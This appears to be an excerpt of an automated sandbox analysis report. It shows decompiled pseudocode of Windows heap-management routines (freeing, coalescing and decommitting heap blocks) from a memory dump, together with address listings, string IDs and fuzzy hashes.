                                                                                                        C-Code - Quality: 69%
                                                                                                        			E00AEA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00AEDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00B09730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00B8A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00B09660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00ACB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00AE7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00B8138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00AE7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00AE7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00B81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00AE7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00AE7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00B81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00B1D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                        0x00aea229
                                                                                                        0x00aea231
                                                                                                        0x00aea23f
                                                                                                        0x00aea242
                                                                                                        0x00aea244
                                                                                                        0x00aea24c
                                                                                                        0x00aea255
                                                                                                        0x00aea25a
                                                                                                        0x00aea25f
                                                                                                        0x00b31c76
                                                                                                        0x00b31c78
                                                                                                        0x00b31c7e
                                                                                                        0x00b31c7f
                                                                                                        0x00b31c81
                                                                                                        0x00b31c82
                                                                                                        0x00b31c84
                                                                                                        0x00b31c89
                                                                                                        0x00b31c8b
                                                                                                        0x00b31c9e
                                                                                                        0x00b31c9e
                                                                                                        0x00b31cab
                                                                                                        0x00b31cb2
                                                                                                        0x00000000
                                                                                                        0x00b31cb2
                                                                                                        0x00b31c8d
                                                                                                        0x00b31c92
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31c94
                                                                                                        0x00b31c98
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31c98
                                                                                                        0x00aea265
                                                                                                        0x00aea265
                                                                                                        0x00aea266
                                                                                                        0x00aea26f
                                                                                                        0x00aea270
                                                                                                        0x00aea276
                                                                                                        0x00aea277
                                                                                                        0x00aea279
                                                                                                        0x00aea27e
                                                                                                        0x00aea282
                                                                                                        0x00b31db5
                                                                                                        0x00b31dbb
                                                                                                        0x00b31dc1
                                                                                                        0x00b31dc5
                                                                                                        0x00b31de4
                                                                                                        0x00b31de9
                                                                                                        0x00b31dc7
                                                                                                        0x00b31ddc
                                                                                                        0x00b31de1
                                                                                                        0x00b31def
                                                                                                        0x00b31df3
                                                                                                        0x00b31df7
                                                                                                        0x00b31dfe
                                                                                                        0x00b31e06
                                                                                                        0x00aea302
                                                                                                        0x00aea308
                                                                                                        0x00aea308
                                                                                                        0x00aea288
                                                                                                        0x00aea28d
                                                                                                        0x00aea294
                                                                                                        0x00b31cc1
                                                                                                        0x00aea29a
                                                                                                        0x00aea29a
                                                                                                        0x00aea29a
                                                                                                        0x00aea29f
                                                                                                        0x00b31ccb
                                                                                                        0x00b31cd1
                                                                                                        0x00b31cd8
                                                                                                        0x00b31cea
                                                                                                        0x00b31cea
                                                                                                        0x00b31cd8
                                                                                                        0x00aea2a9
                                                                                                        0x00aea2af
                                                                                                        0x00aea2bc
                                                                                                        0x00b31cfd
                                                                                                        0x00aea2c2
                                                                                                        0x00aea2c2
                                                                                                        0x00aea2c2
                                                                                                        0x00aea2c7
                                                                                                        0x00b31d07
                                                                                                        0x00b31d0d
                                                                                                        0x00b31d14
                                                                                                        0x00b31d1f
                                                                                                        0x00b31d21
                                                                                                        0x00b31d2c
                                                                                                        0x00b31d2c
                                                                                                        0x00b31d2c
                                                                                                        0x00b31d47
                                                                                                        0x00b31d47
                                                                                                        0x00b31d14
                                                                                                        0x00aea2cd
                                                                                                        0x00aea2d2
                                                                                                        0x00aea2d9
                                                                                                        0x00b31d5a
                                                                                                        0x00aea2df
                                                                                                        0x00aea2df
                                                                                                        0x00aea2df
                                                                                                        0x00aea2e4
                                                                                                        0x00b31d69
                                                                                                        0x00b31d6b
                                                                                                        0x00b31d76
                                                                                                        0x00b31d76
                                                                                                        0x00b31d76
                                                                                                        0x00b31d91
                                                                                                        0x00b31d91
                                                                                                        0x00aea2ea
                                                                                                        0x00aea2f0
                                                                                                        0x00aea2f5
                                                                                                        0x00b31da8
                                                                                                        0x00b31dad
                                                                                                        0x00b31dad
                                                                                                        0x00aea2fd
                                                                                                        0x00aea300
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                        • API String ID: 2994545307-2586055223
                                                                                                        • Opcode ID: 0eefdae3c055f06360c430592f03ed5dadee0c836d25b0ec1a4eb064324f3da0
                                                                                                        • Instruction ID: 4c7cef663a9358fd4ea4dc0dc59d3b95795da5caf52d191aa58916ec1aa2d306
                                                                                                        • Opcode Fuzzy Hash: 0eefdae3c055f06360c430592f03ed5dadee0c836d25b0ec1a4eb064324f3da0
                                                                                                        • Instruction Fuzzy Hash: CA5103322056809FD722DB68C845F6777ECFF90B50F2808A8F5559B2A2D735EC00CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                        • API String ID: 2994545307-336120773
                                                                                                        • Opcode ID: 133f03d88c51e880e9f2232f915e5611168f853cb4782975c241a99de184a80c
                                                                                                        • Instruction ID: 1a8f9bd907af88dfd5fa79575c64120c98c31f7737221ad186a1518404c32649
                                                                                                        • Opcode Fuzzy Hash: 133f03d88c51e880e9f2232f915e5611168f853cb4782975c241a99de184a80c
                                                                                                        • Instruction Fuzzy Hash: E4310131280611FFD724EB98C986F6773E8FF05760F294599F4069F2A2E771A844CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AE99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00AE99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00B7FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00B8A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00B1D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00ACB150();
										} else {
											E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00ACB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xbb6378 = 1;
											asm("int3");
											 *0xbb6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00AEA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00AEA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00AEBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00B8A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00AEA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00AEA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00B1D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00ACB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xbb6378 = 1;
									asm("int3");
									 *0xbb6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00B7FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00B8A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00B1D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00ACB150();
													} else {
														E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00ACB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xbb6378 = 1;
														asm("int3");
														 *0xbb6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00AEA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00AEA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00AEBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00B8A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00B1D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00ACB150();
													} else {
														E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00ACB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xbb6378 = 1;
														asm("int3");
														 *0xbb6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00AEA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00AEA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00AEBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00AEBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                        0x00ae99ca
                                                                                                        0x00ae99cc
                                                                                                        0x00ae99df
                                                                                                        0x00ae99e3
                                                                                                        0x00ae99f8
                                                                                                        0x00ae99fb
                                                                                                        0x00ae99fb
                                                                                                        0x00000000
                                                                                                        0x00ae9a48
                                                                                                        0x00ae9a48
                                                                                                        0x00ae9a4c
                                                                                                        0x00ae9a51
                                                                                                        0x00ae9a55
                                                                                                        0x00ae9a61
                                                                                                        0x00ae9a66
                                                                                                        0x00ae9a68
                                                                                                        0x00b31457
                                                                                                        0x00b3145c
                                                                                                        0x00b3145c
                                                                                                        0x00ae9a68
                                                                                                        0x00ae9a6e
                                                                                                        0x00ae9a71
                                                                                                        0x00ae9a74
                                                                                                        0x00ae9a76
                                                                                                        0x00b31466
                                                                                                        0x00b31469
                                                                                                        0x00b31469
                                                                                                        0x00b3146c
                                                                                                        0x00b3146e
                                                                                                        0x00b31471
                                                                                                        0x00b31474
                                                                                                        0x00b31477
                                                                                                        0x00b31479
                                                                                                        0x00b3159c
                                                                                                        0x00b3159c
                                                                                                        0x00b3159d
                                                                                                        0x00b315a6
                                                                                                        0x00b315ab
                                                                                                        0x00b315ab
                                                                                                        0x00000000
                                                                                                        0x00b315ab
                                                                                                        0x00b3147f
                                                                                                        0x00b31481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3148a
                                                                                                        0x00b3148d
                                                                                                        0x00b31493
                                                                                                        0x00b31495
                                                                                                        0x00b314c0
                                                                                                        0x00b314c0
                                                                                                        0x00b314c3
                                                                                                        0x00b314c6
                                                                                                        0x00b314c8
                                                                                                        0x00b314cb
                                                                                                        0x00b314cf
                                                                                                        0x00b314f2
                                                                                                        0x00b314f2
                                                                                                        0x00b314f5
                                                                                                        0x00b314f8
                                                                                                        0x00b31501
                                                                                                        0x00b31508
                                                                                                        0x00b3150b
                                                                                                        0x00b3150e
                                                                                                        0x00b31510
                                                                                                        0x00b31513
                                                                                                        0x00b31515
                                                                                                        0x00b31515
                                                                                                        0x00b31518
                                                                                                        0x00b31518
                                                                                                        0x00b31513
                                                                                                        0x00b31521
                                                                                                        0x00b31525
                                                                                                        0x00b3152a
                                                                                                        0x00b3152d
                                                                                                        0x00b31530
                                                                                                        0x00b31532
                                                                                                        0x00b31539
                                                                                                        0x00b3153d
                                                                                                        0x00b3155d
                                                                                                        0x00b31562
                                                                                                        0x00b3153f
                                                                                                        0x00b31555
                                                                                                        0x00b3155a
                                                                                                        0x00b31570
                                                                                                        0x00b31577
                                                                                                        0x00b3157c
                                                                                                        0x00b31582
                                                                                                        0x00b31585
